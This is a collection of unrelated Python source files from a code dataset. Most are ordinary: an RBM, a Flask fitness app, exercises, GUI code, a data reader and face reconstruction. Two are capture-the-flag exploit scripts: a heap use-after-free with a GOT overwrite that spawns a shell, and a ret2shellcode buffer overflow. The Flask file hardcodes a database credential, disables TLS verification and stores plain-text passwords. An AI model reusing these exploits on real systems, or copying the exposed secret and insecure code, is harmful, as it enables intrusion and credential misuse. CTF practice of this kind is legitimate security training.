tf.cast(self.v1_input, tf.float32) - self.sample_v1_given_v2h(self.v2_input, h)\n        v1_err = tf.reduce_sum(v1_err * v1_err, [0, 1])\n\n        v2_err = tf.cast(self.v2_input, tf.float32) - self.sample_v2_given_v1h(self.v1_input, h)\n        v2_err = tf.reduce_sum(v2_err * v2_err, [0, 1])\n\n        self.compute_err = v1_err + v2_err\n\n    def v2_predict(self,v1_input):\n\n        # mean field\n        #v2_predictions = self.prop_v1h_v2(v1_inputs, self.h)\n        # sample\n        v1_input_list = np.split(v1_input, self.n_batches)\n        v2_predictions = []\n        for i in range(self.n_batches):\n            v2_prediction = self.sample_v2_given_v1h(self.v1_input, self.final_h)\n            v2_predictions.append(self.tf_session.run(v2_prediction,feed_dict={self.v1_input: v1_input_list[i], self.v2_input: np.zeros([self.batch_size,self.v2_size])}))\n        return np.stack(v2_predictions).reshape(-1,self.v2_size)\n\n\ndef main():\n\n    n_v1 = 30\n    n_v2 = 30\n    n_h = 60\n    n_samples = 5000\n\n    v1s = []\n    v2s = []\n\n    for n in range(n_samples):\n        v1 = generate_v(n_v1, np.arange(n_v1), np.ones(n_v1))\n        v1 = v1.astype(np.float32)\n        v1s.append(v1)\n\n        v2 = generate_v(n_v2, np.arange(n_v2), np.ones(n_v2))\n        v2 = v2.astype(np.float32)\n        v2s.append(v2)\n\n    v1s = np.stack(v1s)\n    v2s = np.stack(v2s)\n\n    print(v1s.shape[0])\n\n    rbm = RBM(name='rbm', v1_size=n_v1, h_size=n_h, v2_size=n_v2\n              , n_data = v1s.shape[0], batch_size=100, learning_rate=0.0000001,\n              num_epochs=500, n_factors=10)\n    errs = rbm.train(v1s, v2s)\n    print('getting predictions')\n    print('v2s:', v2s[:3])\n    v2_predictions = rbm.v2_predict(v1s)\n    print('v2 preds:', v2_predictions[:3])\n\n    print('preds diff:',(v2_predictions - v2s).mean(axis=0))\n\n    rbm.tf_session.close()\n\n\n    if rbm.show_err_plt:\n        plt.plot(range(len(rbm.cost)), rbm.cost)\n        plt.show()\n\nif __name__ == '__main__':\n    main()","sub_path":"rbm_3way_fac.py","file_name":"rbm_3way_fac.py","file_ext":"py","file_size_in_byte":11901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"555781203","text":"\"\"\"\nRoutes and views for the flask application.\n\"\"\"\nimport os\n\n##Date and time with flask imports\nfrom datetime import datetime\nfrom flask import Flask, flash, render_template, request, session\n\n#import for mongo\nimport pymongo\nfrom pymongo import MongoClient\n##import from __init__.py\nfrom GainTracker import app\n\n#connection details for mongo\nuri = \"mongodb://gtmongo:W2zjixLxOssYoTcF8EnnfsAO82vE7RJjfp6wHYcoaJPdsWuf0bm1FXxmk1tXAs4SyhYfd30IAOHDyyTcRKVjcw==@gtmongo.documents.azure.com:10250/?ssl=true&ssl_cert_reqs=CERT_NONE\"\nclient = pymongo.MongoClient(uri)\n\n#initial index route, presents login screen\n@app.route('/')\ndef index():\n    if 'username' in session:\n        return render_template('index.html', title='Home 
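The factored three-way RBM record above wraps its gradient steps in TensorFlow ops; for orientation, here is a minimal NumPy sketch of the plain CD-1 update for an ordinary binary RBM (toy shapes, biases omitted, all names mine, not the factored model itself):

import numpy as np

def sigmoid(x):
    return 1.0 / (1.0 + np.exp(-x))

def cd1_update(W, v0, lr, rng):
    h0 = sigmoid(v0 @ W)                          # positive phase, driven by data
    h0_sample = (rng.random(h0.shape) < h0) * 1.0
    v1 = sigmoid(h0_sample @ W.T)                 # one Gibbs step down ...
    h1 = sigmoid(v1 @ W)                          # ... and back up
    grad = v0.T @ h0 - v1.T @ h1                  # <vh>_data - <vh>_model (CD-1)
    return W + lr * grad / v0.shape[0]

rng = np.random.default_rng(0)
W = np.zeros((6, 4))                              # 6 visible, 4 hidden units
v0 = (rng.random((8, 6)) < 0.5) * 1.0             # toy batch of binary visibles
W = cd1_update(W, v0, lr=0.1, rng=rng)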
Page', year=datetime.now().year,)\n    return render_template('login.html')\n\n#homepage\n@app.route('/home')\ndef home():\n    if 'username' in session:\n        return render_template('index.html', \n            title='Home Page', \n            year=datetime.now().year)\n    return render_template('login.html')\n\n#contact page\n@app.route('/contact')\ndef contact():\n    if 'username' in session:\n        return render_template('contact.html',\n            title='Contact Me', year=datetime.now().year, \n            message='If you want to contact me about anything on this website please do get in touch.')\n    return render_template('login.html')\n\n\n#about page\n@app.route('/about')\ndef about():\n    if 'username' in session:\n        return render_template('about.html',\n            title='About',\n            year=datetime.now().year,\n            message='About GainTracker')\n    return render_template('login.html')\n\n\n@app.route('/workouts', methods=['POST','GET'])\ndef workouts():\n    if 'username' in session:\n\n        db = client.gtmongo.workouts\n\n        if request.method == 'POST':\n            #adds to the db\n            db.insert({'Workout' : request.form['Workout'],'description' : request.form['description'], 'match': session['username']})\n            #puts the db in a list\n            data=list(db.find({'match': session['username']}))\n\n            #renders the workouts template again passing the list parameter for the template\n            return render_template('workouts.html',title='Workouts',year=datetime.now().year,message='Your Workouts page.', workoutinfo = data)\n\n        if request.method == 'GET':\n            #when page is loaded refreshes the template for the workouts\n            data=list(db.find({'match': session['username']}))\n\n            return render_template('workouts.html',title='Workouts',year=datetime.now().year,message='Your Workouts page.', workoutinfo = data)\n        \n        return render_template('workouts.html', workoutinfo = data)\n    return render_template('login.html')\n\n\n\n@app.route('/meals', methods=['POST','GET'])\ndef meals():\n    if 'username' in session:\n\n        db = client.gtmongo.meals\n\n        if request.method == 'POST':\n            #adds to the db\n            db.insert({'Meal' : request.form['Meal'],'Ingredients' : request.form['Ingredients'],'Instructions' : request.form['Instructions'],'Calories' : request.form['Calories'], 'match': session['username']})\n            #puts the db in a list\n            data=list(db.find({'match': session['username']}))\n\n            #renders the workouts template again passing the list parameter for the template\n            return render_template('meals.html',title='Meal Planner',year=datetime.now().year,message='Your meals.', mealplans = data)\n\n        if request.method == 'GET':\n            #when page is loaded refreshes the template for the workouts\n            data=list(db.find({'match': session['username']}))\n\n            return render_template('meals.html',title='Meal Planner',year=datetime.now().year,message='Your Meals.', mealplans = data)\n        \n        return render_template('meals.html')\n    return render_template('login.html')\n\n\n\n##signup function\n@app.route('/signup', methods=['POST','GET'])\ndef signup():\n\n    if request.method == 'POST':\n\n        #in users database\n        users = client.gtmongo.users\n        #if the name exists\n        ifexists = users.find_one({'name' : request.form['username']})\n\n        #if the username doesn't exist\n        if ifexists is None:\n            #insert username and password\n            users.insert({'name' : request.form['username'],'password' : request.form['password']})\n            #username saved to the session\n            session['username'] = request.form['username']\n            #brought to the template for login after signup\n            return render_template('login.html',year=datetime.now().year)\n        #if the name exists\n        return 
render_template('signup.html',year=datetime.now().year, message='Signup Failed, username already exists')\n\n return render_template('signup.html')\n\n#login function\n@app.route('/login', methods=['POST','GET'])\ndef login():\n users = client.gtmongo.users\n username_login_found = users.find_one({'name' : request.form['username']})\n\n if username_login_found:\n if request.form['password'] == username_login_found['password']:\n\n session['username'] = request.form['username']\n\n return render_template('index.html')\n\n return render_template('login.html',year=datetime.now().year, message='Login Failed, please ensure details are correct')\n\n","sub_path":"GainTracker/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"124647730","text":"\"\"\"\nHacer un programa que calcule el precio de una visita al cine con\nuna cantidad indeterminada de asistentes y siguiendo las siguientes\nreglas segun la edad del visitante:\n $0 si es menor de 2 años\n $3 si es menor de 10 años\n $7 si es menor de 20 años\n $10 si es menor de 60 años\n $7 si es mayor o igual que 60\n\"\"\"\n\n# Creamos la factura\nvalor_factura = 0\n\n# Preguntamos hasta que se canse el usuario\nwhile True:\n edad = input(\"Ingrese la edad del visitante\\n\")\n\n # Intentamos convertir la edad\n try:\n edad = int(edad)\n if edad < 2:\n valor_factura += 0\n elif edad < 10:\n valor_factura += 3\n elif edad < 20:\n valor_factura += 7\n elif edad < 60:\n valor_factura += 10\n else:\n valor_factura += 7\n if 'n' == input(\"Desea agregar otro visitante? s/n\\n\").lower():\n break\n except ValueError:\n print('La edad debe ser un número')\n\nprint('El total de su factura es', valor_factura)\n","sub_path":"Semana8/cine.py","file_name":"cine.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"315374722","text":"'''\r\n첫째 줄에는 테스트 케이스의 개수 C가 주어진다.\r\n\r\n둘째 줄부터 각 테스트 케이스마다 학생의 수 \r\nN(1 ≤ N ≤ 1000, N은 정수)이 첫 수로 주어지고, \r\n이어서 N명의 점수가 주어진다. 
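The signup and login handlers in the GainTracker record above store and compare passwords in plain text; a self-contained sketch of the usual hardening with Werkzeug's helpers (the two werkzeug functions are real, the wrapper names are mine):

from werkzeug.security import generate_password_hash, check_password_hash

def make_user(username, password):
    # Store a salted hash, never the raw password.
    return {'name': username, 'password': generate_password_hash(password)}

def verify(user, password):
    # check_password_hash re-derives the hash and compares it.
    return user is not None and check_password_hash(user['password'], password)

u = make_user('alice', 's3cret')
print(verify(u, 's3cret'), verify(u, 'wrong'))  # True False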
\r\n점수는 0보다 크거나 같고, 100보다 작거나 같은 정수이다.\r\n\r\n각 케이스마다 한 줄씩 평균을 넘는 학생들의 비율을 \r\n반올림하여 소수점 셋째 자리까지 출력한다.\r\n'''\r\nimport sys\r\ntest_case=int(input())\r\n\r\nfor i in range(test_case):\r\n data=list(map(int,sys.stdin.readline().split()))\r\n count=0\r\n average=sum(data[1:])/data[0]\r\n for j in range(1,data[0]+1):\r\n if data[j]>average:\r\n count+=1\r\n answer=round(count/data[0]*100,3)\r\n print(f'{answer:.3f}%' )","sub_path":"평균은_넘겠지.py","file_name":"평균은_넘겠지.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"225320083","text":"from PyQt5 import QtCore, QtGui, QtWidgets\n\nclass Ui_MainWindow(object):\n def setupUi(self, MainWindow):\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(640, 537)\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.tabWidget = QtWidgets.QTabWidget(self.centralwidget)\n self.tabWidget.setGeometry(QtCore.QRect(0, 0, 611, 501))\n self.tabWidget.setStyleSheet(\"\")\n self.tabWidget.setObjectName(\"tabWidget\")\n self.tab_1 = QtWidgets.QWidget()\n self.tab_1.setStyleSheet(\"background:rgb(155, 122, 200)\\n\"\n\"\")\n self.tab_1.setObjectName(\"tab_1\")\n self.tableView = QtWidgets.QTableView(self.tab_1)\n self.tableView.setGeometry(QtCore.QRect(10, 10, 521, 301))\n self.tableView.setObjectName(\"tableView\")\n self.tabWidget.addTab(self.tab_1, \"\")\n self.tab = QtWidgets.QWidget()\n self.tab.setStyleSheet(\"background:orange\")\n self.tab.setObjectName(\"tab\")\n self.tabWidget.addTab(self.tab, \"\")\n MainWindow.setCentralWidget(self.centralwidget)\n self.menubar = QtWidgets.QMenuBar(MainWindow)\n self.menubar.setGeometry(QtCore.QRect(0, 0, 640, 23))\n self.menubar.setObjectName(\"menubar\")\n self.menu = QtWidgets.QMenu(self.menubar)\n self.menu.setObjectName(\"menu\")\n self.menu_2 = QtWidgets.QMenu(self.menubar)\n self.menu_2.setObjectName(\"menu_2\")\n self.menu_3 = QtWidgets.QMenu(self.menubar)\n self.menu_3.setObjectName(\"menu_3\")\n MainWindow.setMenuBar(self.menubar)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName(\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n self.menubar.addAction(self.menu.menuAction())\n self.menubar.addAction(self.menu_2.menuAction())\n self.menubar.addAction(self.menu_3.menuAction())\n\n self.retranslateUi(MainWindow)\n self.tabWidget.setCurrentIndex(0)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"对讲模块\"))\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_1), _translate(\"MainWindow\", \"设备列表\"))\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab), _translate(\"MainWindow\", \"分组码列表\"))\n self.menu.setTitle(_translate(\"MainWindow\", \"设备查看\"))\n self.menu_2.setTitle(_translate(\"MainWindow\", \"分组查看\"))\n self.menu_3.setTitle(_translate(\"MainWindow\", \"主板信息查看\"))\n\n# 作者:Symbian米汤\n# 链接:https://www.jianshu.com/p/7812da75db13\n# 來源:简书\n# 著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。","sub_path":"07GUI/08Pyqt5/07Qtableview/UI.py","file_name":"UI.py","file_ext":"py","file_size_in_byte":2900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"293359071","text":"#!/usr/bin/python\nimport pwn\n\nclass MonkeExploit:\n \"\"\"\n Eats the useless messages returned by the server\n \"\"\"\n def eatmessage(self):\n 
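The Ui_MainWindow class in the PyQt5 record above is Designer-generated and only builds widgets; the host application that normally drives it looks roughly like this (the module name UI is assumed from the record's file_name, the rest is standard PyQt5 boilerplate):

import sys
from PyQt5 import QtWidgets
from UI import Ui_MainWindow  # module name assumed from the record's file_name

class MainWindow(QtWidgets.QMainWindow):
    def __init__(self):
        super().__init__()
        self.ui = Ui_MainWindow()
        self.ui.setupUi(self)  # builds the tabs, table view and menu bar

if __name__ == '__main__':
    app = QtWidgets.QApplication(sys.argv)
    window = MainWindow()
    window.show()
    sys.exit(app.exec_())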
if self.banana_unlocked:\n self.s.recvuntil(\"3: take banana\\n\")\n else:\n self.s.recvuntil(\"2: inventory\\n\")\n \n def walk(self, direction):\n s = self.s\n s.sendline(\"0\")\n s.recvuntil(\"[n|s|e|w]\\n\")\n s.sendline(direction)\n buf = s.recvline()\n self.eatmessage()\n return buf\n\n def take_banana(self, name):\n # send \"take banana\" option\n s = self.s\n s.sendline(\"3\")\n s.recvuntil(\"like the name to be:\\n\")\n s.sendline(\"%s\" % (len(name) + 2))\n s.recvuntil(\"like to name it:\\n\")\n s.sendline(name)\n self.eatmessage()\n\n def eat_banana(self, item):\n s = self.s\n s.sendline(\"2\")\n s.sendline(\"%d\" % item)\n s.recvuntil(\"rename]:\")\n s.sendline(\"eat\")\n self.eatmessage()\n\n def __init__(self, is_remote=False):\n if not is_remote:\n self.s = pwn.process(\"./monke\")\n self.libc = pwn.ELF(\"/usr/lib/libc.so.6\")\n else:\n self.s = pwn.remote(\"pwn.utctf.live\", 9999)\n self.libc = pwn.ELF(\"libc-2.27.so\")\n self.banana_unlocked = False\n\n # Walk until we have bananas\n print(self.walk(\"s\"))\n self.banana_unlocked = True\n print(self.walk(\"s\"))\n\n # Create a dummy banana\n self.take_banana(\"A\"*0x10)\n\n # Now go to the 4th dimension so we can delete bananas\n self.banana_unlocked = False\n print(self.walk(\"k\"))\n\n # Walk until we find new bananas\n print(self.walk(\"n\"))\n print(self.walk(\"n\"))\n print(self.walk(\"n\"))\n\n # This time we get bananas\n self.banana_unlocked = True\n self.walk(\"n\")\n\n # Trigger the UAF\n self.eat_banana(0)\n self.take_banana(\"A\"*0x10)\n \n # Now try to get a glibc leak\n self.s.sendline(\"2\")\n self.s.sendline(\"0\")\n self.s.recvuntil(\"rename]:\\n\")\n self.s.sendline(\"rename\")\n self.s.recvuntil(\"like to name it:\\n\")\n FGETS_ADDR = 0x602018\n self.s.sendline(pwn.pack(FGETS_ADDR,64) + pwn.pack(0x8, 64))\n self.eatmessage()\n \n self.s.sendline(\"2\")\n print(self.s.recvline())\n print(self.s.recvline())\n glibc_leak = self.s.recvline()[3:-1]\n print(glibc_leak)\n \n glibc_base = pwn.unpack(glibc_leak, len(glibc_leak)*8) - self.libc.symbols['free']\n print(hex(glibc_base))\n SYSTEM_ADDR = glibc_base + self.libc.symbols['system']\n\n # Rename the second banana, which will write into free relro entry\n self.s.sendline(\"1\")\n self.s.recvuntil(\"rename]:\\n\")\n self.s.sendline(\"rename\")\n self.s.recvuntil(\"like to name it:\\n\")\n self.s.sendline(pwn.pack(SYSTEM_ADDR, 48))\n self.eatmessage()\n\n self.take_banana(\"/bin/sh\")\n self.s.sendline(\"2\")\n print(self.s.recvline())\n print(self.s.recvline())\n print(self.s.recvline())\n print(self.s.recvline())\n self.s.sendline(\"2\")\n print(self.s.recvline())\n self.s.sendline(\"eat\")\n self.s.interactive()\ns = MonkeExploit(True)","sub_path":"2021/utctf/pwn/monke/pwn_monke.py","file_name":"pwn_monke.py","file_ext":"py","file_size_in_byte":3324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"129760405","text":"import matplotlib.pyplot as plt\n\nimport numpy as np\n\nb = 5\nprint(b)\na = np.linspace(3, -3, 10)\nx = np.arange(-5, 5, 0.1)\nprint(x)\nfor a1 in a:\n y = a1 * x + b\n plt.plot(x, y, label=f\"y={a1}x+{b:.1f}\")\nplt.legend(loc=2)\nplt.axhline(0, color='black')\nplt.axvline(0, color='black')\nplt.show()\n","sub_path":"demo3_plot_y_ax_b_2.py","file_name":"demo3_plot_y_ax_b_2.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"480079635","text":"class Cliente(Persona):\n def __init__(self, nombre, 
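The monke exploit above repeatedly converts between integers and little-endian byte strings with pwntools' pack/unpack helpers; a tiny standalone sketch of that leak-handling step (the address value is made up):

from pwn import p64, u64

libc_free = 0x7f1234567890               # pretend leaked address of free()
blob = p64(libc_free)                    # 8 little-endian bytes, as on the wire
leak = blob.rstrip(b'\x00')              # servers usually stop at the first NUL
recovered = u64(leak.ljust(8, b'\x00'))  # pad back to 8 bytes before unpacking
assert recovered == libc_free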
apellido, dni, direccion, telefono, mail,fechaAlta, fechaBaja, sucursal,numerocu):\n Persona.__init__(self, nombre, apellido, dni, direccion, telefono, mail)\n self.nombre = nombre\n self.apellido = apellido\n self.dni = dni\n self.direccion = direccion\n self.telefono = telefono\n self.mail = mail\n self.fechaAlta = fechaAlta\n self.fechaBaja = fechaBaja\n self.sucursal = sucursal\n self.cuenta = Cuenta(numerocu)\n\n\n def clienteActivo(self): # define si el cliente esta activo o no\n if self.fechaBaja == None: # pegunta si fechaBaja no esta el cliente esta activo\n print(\"Cliente Activo\")\n else:\n print(\"Cliente Inactivo\")\n","sub_path":"ingenieriaDelSoftware/clienteBco.py","file_name":"clienteBco.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"532923194","text":"from django.urls import path\nfrom voting import views\n\nurlpatterns = [\n path('', views.home, name='home'),\n path('signup', views.signup, name='signup'),\n path('login', views.login, name='login'),\n path('logout',views.logout,name='logout'),\n path('adminlogin/', views.adminlogin, name='adminlogin'),\n path('vote/', views.voting, name='voting'),\n path('submit/', views.submit, name='submit'),\n path('thanks/', views.thanks, name='thanks'),\n path('count',views.count,name='count'),\n]\n","sub_path":"backend/voting/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"650420242","text":"#coding=utf-8\nimport sys\nsys.path.append(\"..\")\nimport pickle \nimport numpy as np\nimport os\nimport tensorflow as tf\nimport time\nimport scipy.misc\n\n\n\nclass Cifar100DataReader():\n def __init__(self,cifar_folder,batch_size,test_batch_size = 10000,onehot=True, resize=False):\n self.cifar_folder=cifar_folder\n self.onehot=onehot\n self.data_label_train=None # 训练集\n self.data_label_test=None # 测试集\n self.batch_index=0 # 训练数据的batch块索引\n self.test_batch_index=0 # 测试数据的batch_size\n self.batch_size = batch_size\n self.test_batch_size = test_batch_size\n self.resize = resize\n f=os.path.join(self.cifar_folder,\"train\") # 训练集有50000张图>片,100个类,每个类500张\n print ('read: %s'%f )\n fo = open(f, 'rb')\n self.dic_train = pickle.load(fo,encoding='bytes')\n # self.dic_train = pickle.load(fo,encoding='bytes')\n fo.close()\n self.data_label_train=list(zip(self.dic_train[b'data'],self.dic_train[b'fine_labels']) ) #label 0~99 \n np.random.shuffle(self.data_label_train)\n\n\n def dataInfo(self):\n print (self.data_label_train[0:2] )# 每个元素为二元组,第一个是numpy数组大小为32*32*3,第二是label\n print (self.dic_train.keys())\n print (b\"coarse_labels:\",len(self.dic_train[b\"coarse_labels\"]))\n print (b\"filenames:\",len(self.dic_train[b\"filenames\"]))\n print (b\"batch_label:\",len(self.dic_train[b\"batch_label\"]))\n print (b\"fine_labels:\",len(self.dic_train[b\"fine_labels\"]))\n print (b\"data_shape:\",np.shape((self.dic_train[b\"data\"])))\n print (b\"data0:\",type(self.dic_train[b\"data\"][0]))\n\n\n # 得到下一个batch训练集,块大小为100\n def next_train_data(self):\n \"\"\" \n return list of numpy arrays [na,...,na] with specific batch_size \n na: N dimensional numpy array \n \"\"\"\n if self.batch_index\n#\n# Distributed under terms of the MIT license.\n\nfrom pwn import *\n\np = process('./bamboo_ret2shellcode')\n# shellcode = asm(shellcraft.i386.linux.sh())\nshellcode = asm(shellcraft.sh())\nbuf2_addr = 0x804a080\n\np.sendline(shellcode.ljust(112, 'A') + 
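The Cliente class above calls Persona.__init__ and then re-assigns every inherited attribute by hand; a trimmed sketch of the cooperative form (Persona is not in the record, so its definition here is assumed, and the field list is shortened):

class Persona:
    def __init__(self, nombre, apellido, dni):
        self.nombre = nombre
        self.apellido = apellido
        self.dni = dni

class Cliente(Persona):
    def __init__(self, nombre, apellido, dni, numerocu):
        super().__init__(nombre, apellido, dni)  # base class sets shared fields once
        self.numerocu = numerocu                 # subclass only adds its own state

c = Cliente('Ana', 'Diaz', '12345678', 42)
print(c.nombre, c.numerocu)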
p32(buf2_addr))\np.interactive()\n\n","sub_path":"bamboofox/ret2shellcode/solve_bamboo_ret2shellcode.py","file_name":"solve_bamboo_ret2shellcode.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"453195088","text":"import random\nimport socket as sock\ndrop = 0 #set to 0 to drop packets and 1 to never drop packets\ndrop_freq = 2 # 1 out of this many packets dropped\nnum_for_handshake = 4 #for this many packets we will never drop\nclass badSocket(sock.socket):\n\tdef __init__(self, *arg):\n\t\tself.AF_INET = sock.AF_INET \n\t\tself.SOCK_DGRAM = sock.SOCK_DGRAM\n\t\tself.num = num_for_handshake\n\t\tsuper(badSocket,self).__init__(*arg)\n\t\tprint('got here')\n\tdef socket(self, *arg):\n\t\treturn badSocket(sock.AF_INET, sock.SOCK_DGRAM)\n\tdef sendto_bad(self, data, addr):\n\t\tself.num -= 1\n\t\tif random.randint(drop,drop_freq) or self.num > 0:\n\t\t\tprint('sending this packet')\n\t\t\treturn super(badSocket, self).sendto(data, addr)\n\t\telse:\n\t\t\tprint('dropping this packet')\n\t\t\treturn len(data)\n\tdef send_bad(self, data):\n\t\tself.num -= 1\n\t\tif random.randint(drop,drop_freq) or self.num > 0:\n\t\t\tprint('sending this packet')\n\t\t\treturn super(badSocket, self).send(data)\n\t\telse:\n\t\t\tprint('dropping this packet')\n\t\t\treturn len(data)\n\tdef sendall_bad(self, data):\n\t\treturn self.send_bad(data)\ndef socket(self, *arg):\n\treturn badSocket(sock.AF_INET, sock.SOCK_DGRAM)\nAF_INET = sock.AF_INET \nSOCK_DGRAM = sock.SOCK_DGRAM\nerror = sock.error\ntimeout = sock.timeout\n","sub_path":"Project2/wrapper.py","file_name":"wrapper.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"228328398","text":"import cv2\nimport numpy as np\nfrom PIL import Image\n\n\nclass FaceReconstructor(object):\n \"\"\"\n Inverts the extraction steps of the FaceExtractor\n 0. Sharpen image, if option is selected\n 1. Invert fine cropping of the ROI\n 2. Invert alignment of eyes\n 3. Invert masking of background\n 4. 
Invert coarse cropping of the ROI\n \"\"\"\n\n def __init__(self, mask_factor=-10, postprocessing='blur'):\n \"\"\"\n :param mask_factor: Increase or decrease region to insert\n :param postprocessing: Enable sharpening or blurring\n * None: No postprocessing\n * 'blur': blur image\n * 'sharp': sharpen image\n \"\"\"\n self.postprocessing = postprocessing\n if self.postprocessing == 'sharp':\n self.face_sharpener = FaceSharpener()\n if self.postprocessing == 'blur':\n self.face_blurer = FaceBlurer()\n self.face_decropper_fine = FaceDecropperFine()\n self.face_dealigner = FaceDealigner()\n self.face_demasker = FaceDemasker(mask_factor)\n self.face_decropper_coarse = FaceDecropperCoarse()\n\n def __call__(self, processed_image, extraction_information):\n \"\"\"\n :param processed_image: PIL image\n :param extraction_information: namedtuple with the following elements\n * image_original: The original scene (PIL image)\n * image_cropped: The cropped region from the original image (PIL image)\n * bounding_box_coarse: Namedtuple with the coordinates of the cropped ROI\n in the original image\n * offsets_coarse: index shift to pad image and prevent indices out of image\n * size_coarse: size (quadratic) of the coarse cropped image\n * mask: Mask applied to filter background\n * rotation: Namedtuple with rotation and rotation center to align eyes\n * bounding_box_fine: Namedtuple with the coordinates of the fine cropped\n ROI in the coarse cropped region\n * offsets_fine: index shift to pad image and prevent indices out of image\n * size_fine: size (quadratic) of the fine cropped image\n * landmarks: coordinates of facial regions (x,y)\n :return: reconstructed image (PIL image)\n \"\"\"\n # Convert PIL image into np.array\n processed_image = np.array(processed_image)\n original_image = np.array(extraction_information.image_original)\n coarse_cropped_image = np.array(extraction_information.image_cropped)\n\n if self.postprocessing == 'sharp':\n post_processed_image = self.face_sharpener(processed_image)\n elif self.postprocessing == 'blur':\n post_processed_image = self.face_blurer(processed_image)\n else:\n post_processed_image = processed_image\n decropped_image = self.face_decropper_fine(post_processed_image,\n extraction_information.bounding_box_fine,\n extraction_information.offsets_fine,\n extraction_information.size_coarse)\n dealigned_image = self.face_dealigner(decropped_image,\n extraction_information.rotation)\n demasked_image = self.face_demasker(dealigned_image,\n coarse_cropped_image,\n extraction_information.mask)\n decropped_image = self.face_decropper_coarse(demasked_image,\n original_image,\n extraction_information.bounding_box_coarse,\n extraction_information.offsets_coarse)\n # Convert np.array into PIL image\n reconstructed_image = Image.fromarray(decropped_image)\n return reconstructed_image\n\n\nclass FaceSharpener(object):\n \"\"\"\n Sharpen the given image\n Sharpening via inverse gaussian filtering on the\n L channel of the image in the CIELab color space\n \"\"\"\n\n def __init__(self, sharp_factor=5):\n \"\"\"\n :param sharp_factor: Sharpening degree\n \"\"\"\n self.sharp_factor = sharp_factor\n\n def __call__(self, image):\n image = cv2.cvtColor(image, cv2.COLOR_RGB2Lab)\n # Extract L channel\n L = image[:, :, 0]\n # Inverse filtering\n L_blur = cv2.GaussianBlur(L, (0, 0), self.sharp_factor)\n L_sharp = cv2.addWeighted(L_blur, -1, L, 2, 0)\n # Substitute L channel with sharpened L channel\n image[:, :, 0] = L_sharp\n image = cv2.cvtColor(image, cv2.COLOR_Lab2RGB)\n\n 
return image\n\n\nclass FaceBlurer(object):\n \"\"\"\n Blur the given image\n Blur via gaussian filtering on the\n L channel of the image in the CIELab color space\n \"\"\"\n\n def __init__(self, blur_factor=1.5):\n \"\"\"\n :param blur_factor: Blurring degree\n \"\"\"\n self.blur_factor = blur_factor\n\n def __call__(self, image):\n image = cv2.cvtColor(image, cv2.COLOR_RGB2Lab)\n # Extract L channel\n L = image[:, :, 0]\n # Gaussian blurring\n L_blur = cv2.GaussianBlur(L, (0, 0), self.blur_factor)\n # Substitute L channel with blurred L channel\n image[:, :, 0] = L_blur\n image = cv2.cvtColor(image, cv2.COLOR_Lab2RGB)\n\n return image\n\n\nclass FaceDecropperFine(object):\n \"\"\"\n Invert the fine cropping of the aligned and masked image\n \"\"\"\n\n def __call__(self, cropped_image, bounding_box, offsets, size_coarse):\n \"\"\"\n :param cropped_image: The constructed image\n :param bounding_box: named tuple with absolute coordinates of the fine crop\n :param offsets: named tuple with the offsets (padding + image out of range) of the fine\n crop for every bounding box side\n :param size_coarse: size of the coarse cropped image\n :return: The aligned face only coarsely cropped\n \"\"\"\n decropped_image = np.zeros((size_coarse, size_coarse, cropped_image.shape[2]), dtype=np.uint8)\n # Invert the crop\n decropped_image[bounding_box.top:bounding_box.bottom, bounding_box.left:bounding_box.right] = \\\n cropped_image[offsets.top:offsets.bottom, offsets.left:offsets.right]\n return decropped_image\n\n\nclass FaceDealigner(object):\n \"\"\"\n Invert the alignment of the face with the position of the eyes\n \"\"\"\n\n def __call__(self, aligned_image, rotation):\n \"\"\"\n :param aligned_image: The uncropped constructed image\n :param rotation: The rotation applied to align the image\n :return: The constructed image in original pose\n \"\"\"\n H, W = aligned_image.shape[:2]\n R = cv2.getRotationMatrix2D(rotation.center, -rotation.angle, 1.0)\n dealigned_image = cv2.warpAffine(aligned_image, R, (W, H))\n return dealigned_image\n\n\nclass FaceDemasker(object):\n \"\"\"\n Invert the masking of the image\n The mask can be additionally accessed via an morphological operation\n Recommended is an erosion to fit only the center of the face\n \"\"\"\n\n def __init__(self, morphing=-10):\n \"\"\"\n :param morphing: Size of the morphological kernel in percent of\n the image size\n * morphing > 0: dilation -> increase mask\n * morphing < 0: erosion -> decrease mask (recommended)\n \"\"\"\n self.morphing = morphing\n\n def __call__(self, masked_image, cropped_image, mask):\n \"\"\"\n :param masked_image: The masked constructed image\n :param cropped_image: The cropped original image\n :param mask: The mask applied to the image\n :return: The reconstructed image in the cropped scene\n \"\"\"\n H, W = masked_image.shape[:2]\n\n # Calculate image resolution dependent kernel (H==W) (odd size)\n k_size = 